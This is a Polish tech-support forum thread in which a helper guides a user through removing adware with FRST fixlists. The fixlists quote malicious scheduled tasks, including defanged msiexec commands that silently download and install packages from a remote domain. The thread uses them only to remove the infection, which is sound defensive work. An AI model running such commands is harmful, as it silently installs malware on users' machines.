Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wirus otwiera reklamy w przeglądarce i blokuje programy typu adwcleaner

HADES5 22 Paź 2018 23:21 138 7
  • Pomocny post
    #2 22 Paź 2018 23:36
    Kolobos
    Spec od komputerów

    Fixlist.txt dla FRST:
    HKU\S-1-5-21-3644597930-3155495810-2168713097-1001\...\MountPoints2: {7bbf3995-bd39-11e7-9bb4-704d7b6577c8} - "G:\setup.exe"
    HKU\S-1-5-21-3644597930-3155495810-2168713097-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10222018222335271\...\MountPoints2: {7bbf3995-bd39-11e7-9bb4-704d7b6577c8} - "G:\setup.exe"
    GroupPolicy: Ograniczenia - Chrome <==== UWAGA
    FF Plugin HKU\S-1-5-21-3644597930-3155495810-2168713097-1001: @my.com/Games -> C:\Users\gta38\AppData\Local\MyComGames\NPMyComDetector.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-3644597930-3155495810-2168713097-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-10222018222335271: @my.com/Games -> C:\Users\gta38\AppData\Local\MyComGames\NPMyComDetector.dll [Brak pliku]
    S3 mracsvc; C:\WINDOWS\System32\mracsvc.exe [7409368 2017-11-24] (LLC Mail.Ru)
    S3 mracdrv; C:\WINDOWS\System32\drivers\mracdrv.sys [6637344 2017-11-24] (LLC Mail.Ru)
    2018-10-22 19:52 - 2018-10-22 22:09 - 000000000 ____D C:\AdwCleaner
    2018-10-22 19:52 - 2018-10-22 19:52 - 007592144 _____ (Malwarebytes) C:\Users\gta38\Downloads\AdwCleaner(1).exe
    2018-10-22 18:21 - 2018-10-22 18:21 - 007592144 _____ (Malwarebytes) C:\Users\gta38\Downloads\adwcleaner_7.2.4.0.exe
    2018-10-21 23:23 - 2018-10-21 23:23 - 000003876 _____ C:\WINDOWS\System32\Tasks\{8794E4B5-0170-D195-3FA4-3C58ED43DB2A}
    2018-10-21 23:23 - 2018-10-21 23:23 - 000003732 _____ C:\WINDOWS\System32\Tasks\{B02F465C-79D1-93C1-4B18-D9A360DE16E1}
    2018-10-21 23:23 - 2018-10-21 23:23 - 000003512 _____ C:\WINDOWS\System32\Tasks\{60BD263A-20D2-B4FD-7AB4-E8463C90A5AC}
    2018-04-12 01:34 - 2018-04-12 01:34 - 000060416 ____N (Microsoft Corporation) C:\Users\gta38\EIaEc.exe
    2018-04-12 01:34 - 2018-04-12 01:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\bUUVX.exe
    2018-04-12 01:34 - 2018-04-12 01:34 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\OpiiitSbTe.exe
    2018-09-07 21:13 - 2018-10-21 23:23 - 000000002 _____ () C:\Users\gta38\AppData\Local\imw.ini

    Po wykonaniu zamiesc logi z trybu normalnego, juz razem z addition.

    0
  • #3 22 Paź 2018 23:41
    HADES5
    Poziom 2  

    To znaczy mam to wkleić do notatnika kiedy odpale FRST i dać napraw bo przyznam że jestem zielony w tym temacie :(

    0
  • Pomocny post
    #4 22 Paź 2018 23:47
    Kolobos
    Spec od komputerów

    Tak, zapisujesz zawartosc pod nazwa Fixlist.txt w katalogu w ktorym masz FRST i naciskasz Napraw.

    0
  • Pomocny post
    #6 23 Paź 2018 06:14
    Kolobos
    Spec od komputerów

    To tylko i wylaczanie Twoja wina. Dawanie logow na raty wcale tutaj nie pomaga! Masz zamiesci oba nowe na raz (po wykonaniu).

    Kolejny Fixlist.txt dla FRST:
    Task: {0F804B94-1621-4376-B429-8D6A4FB77AF5} - System32\Tasks\{8794E4B5-0170-D195-3FA4-3C58ED43DB2A} => "C:\Program Files\Mozilla Firefox\firefox.exe" hxxp://mynewsfor.com/cl/?guid=figg8789brvc76wy3fa0ai26nuciyiw4&prid=1&pid=4_1324_0
    Task: {27A7FD48-138B-4478-BF8F-31E777CE2FE5} - System32\Tasks\J5ljfVFEwtkY => j5ljfvfewtky.exe <==== UWAGA
    Task: {414A4311-3205-4FEA-8264-C194084B1E71} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
    Task: {7BFF0E3E-DD2E-46EA-ABD6-1BEA05155809} - System32\Tasks\{06A25024-00EB-4D1A-B5C6-0CE18DE21C1C} => C:\WINDOWS\system32\pcalua.exe -a "D:\Heroes of Might and Magic 3 Complete\SoD\Install.exe" -d "D:\Heroes of Might and Magic 3 Complete\SoD"
    Task: {B06A57C5-04EE-4B12-828F-27B10B7EC513} - System32\Tasks\{60BD263A-20D2-B4FD-7AB4-E8463C90A5AC} => "msiexec" -i hxxp://inthemel.info/mud73kf2fqh2.yzo -q
    Task: {D2359313-B0A2-4AF8-9AD1-EA8D691D346A} - System32\Tasks\{B02F465C-79D1-93C1-4B18-D9A360DE16E1} => "msiexec.exe" -q /package hxxp://inthemel.info/asiswmprupyz.qrm


    Jezeli FRST juz dziala w trybie normalnym to z normalnego.

    0
  • #8 23 Paź 2018 12:41
    Kolobos
    Spec od komputerów

    W takim razie usun katalog C:\FRST i to wszystko.

    0